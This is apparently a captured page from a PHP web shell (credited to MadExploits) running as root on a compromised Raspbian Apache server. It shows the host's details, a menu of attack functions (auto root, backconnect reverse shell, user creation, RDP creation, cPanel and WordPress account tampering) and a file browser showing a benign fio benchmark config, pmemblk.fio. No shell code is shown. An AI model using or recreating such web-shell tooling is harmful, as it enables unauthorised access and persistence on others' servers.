Linux lorencats.com 5.10.103-v7l+ #1529 SMP Tue Mar 8 12:24:00 GMT 2022 armv7l
Apache/2.4.59 (Raspbian)
: 10.0.0.29 | : 216.73.216.10
Cant Read [ /etc/named.conf ]
7.3.31-1~deb10u7
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
fio /
examples /
[ HOME SHELL ]
Name
Size
Permission
Action
1mbs_clients.fio
879
B
-rw-r--r--
aio-read.fio
205
B
-rw-r--r--
backwards-read.fio
137
B
-rw-r--r--
basic-verify.fio
377
B
-rw-r--r--
butterfly.fio
344
B
-rw-r--r--
cpp_null.fio
102
B
-rw-r--r--
cpuio.fio
75
B
-rw-r--r--
cross-stripe-verify.fio
747
B
-rw-r--r--
dev-dax.fio
1.06
KB
-rw-r--r--
disk-zone-profile.fio
238
B
-rw-r--r--
e4defrag.fio
527
B
-rw-r--r--
e4defrag2.fio
1.31
KB
-rw-r--r--
enospc-pressure.fio
1.03
KB
-rw-r--r--
falloc.fio
762
B
-rw-r--r--
filecreate-ioengine.fio
569
B
-rw-r--r--
fio-rand-RW.fio
210
B
-rw-r--r--
fio-rand-read.fio
191
B
-rw-r--r--
fio-rand-write.fio
195
B
-rw-r--r--
fio-seq-RW.fio
205
B
-rw-r--r--
fio-seq-read.fio
156
B
-rw-r--r--
fio-seq-write.fio
190
B
-rw-r--r--
fixed-rate-submission.fio
249
B
-rw-r--r--
flow.fio
329
B
-rw-r--r--
fsx.fio
209
B
-rw-r--r--
ftruncate.fio
563
B
-rw-r--r--
gfapi.fio
264
B
-rw-r--r--
gpudirect-rdmaio-client.fio
217
B
-rw-r--r--
gpudirect-rdmaio-server.fio
136
B
-rw-r--r--
http-s3.fio
588
B
-rw-r--r--
http-swift.fio
680
B
-rw-r--r--
http-webdav.fio
337
B
-rw-r--r--
ime.fio
868
B
-rw-r--r--
iometer-file-access-server.fio
439
B
-rw-r--r--
jesd219.fio
596
B
-rw-r--r--
latency-profile.fio
486
B
-rw-r--r--
libhdfs.fio
112
B
-rw-r--r--
libpmem.fio
1.4
KB
-rw-r--r--
mtd.fio
229
B
-rw-r--r--
netio.fio
395
B
-rw-r--r--
netio_multicast.fio
383
B
-rw-r--r--
null.fio
98
B
-rw-r--r--
numa.fio
401
B
-rw-r--r--
pmemblk.fio
2.02
KB
-rw-r--r--
poisson-rate-submission.fio
432
B
-rw-r--r--
rados.fio
567
B
-rw-r--r--
rand-zones.fio
934
B
-rw-r--r--
rbd.fio
543
B
-rw-r--r--
rdmaio-client.fio
179
B
-rw-r--r--
rdmaio-server.fio
108
B
-rw-r--r--
ssd-steadystate.fio
1.14
KB
-rw-r--r--
ssd-test.fio
847
B
-rw-r--r--
steadystate.fio
741
B
-rw-r--r--
surface-scan.fio
399
B
-rw-r--r--
tiobench-example.fio
287
B
-rw-r--r--
waitfor.fio
354
B
-rw-r--r--
zipf.fio
221
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : pmemblk.fio
[global] bs=1m ioengine=pmemblk norandommap time_based=1 runtime=30 group_reporting disable_lat=1 disable_slat=1 disable_clat=1 clat_percentiles=0 cpus_allowed_policy=split # For the pmemblk engine: # # IOs always complete immediately # IOs are always direct # Must use threads # iodepth=1 direct=1 thread=1 numjobs=16 # # Unlink can be used to remove the files when done, but if you are # using serial runs with stonewall, and you want the files to be created # only once and unlinked only at the very end, then put the unlink=1 # in the last group. This is the method demonstrated here. # # Note that if you have a read-only group and if the files will be # newly created, then all of the data will read back as zero and the # read will be optimized, yielding performance that is different from # that of reading non-zero blocks (or unoptimized zero blocks). # unlink=0 # # The pmemblk engine does IO to files in a DAX-mounted filesystem. # The filesystem should be created on an NVDIMM (e.g /dev/pmem0) # and then mounted with the '-o dax' option. Note that the engine # accesses the underlying NVDIMM directly, bypassing the kernel block # layer, so the usual filesystem/disk performance monitoring tools such # as iostat will not provide useful data. # # Here we specify a test file on each of two NVDIMMs. The first # number after the file name is the block size in bytes (4096 bytes # in this example). The second number is the size of the file to # create in MiB (1 GiB in this example); note that the actual usable # space available to fio will be less than this as libpmemblk requires # some space for metadata. # # Currently, the minimum block size is 512 bytes and the minimum file # size is about 17 MiB (these are libpmemblk requirements). # # While both files in this example have the same block size and file # size, this is not required. # filename=/pmem0/fio-test,4096,1024 filename=/pmem1/fio-test,4096,1024 [pmemblk-write] rw=randwrite stonewall [pmemblk-read] rw=randread stonewall # # We're done, so unlink the file: # unlink=1
Close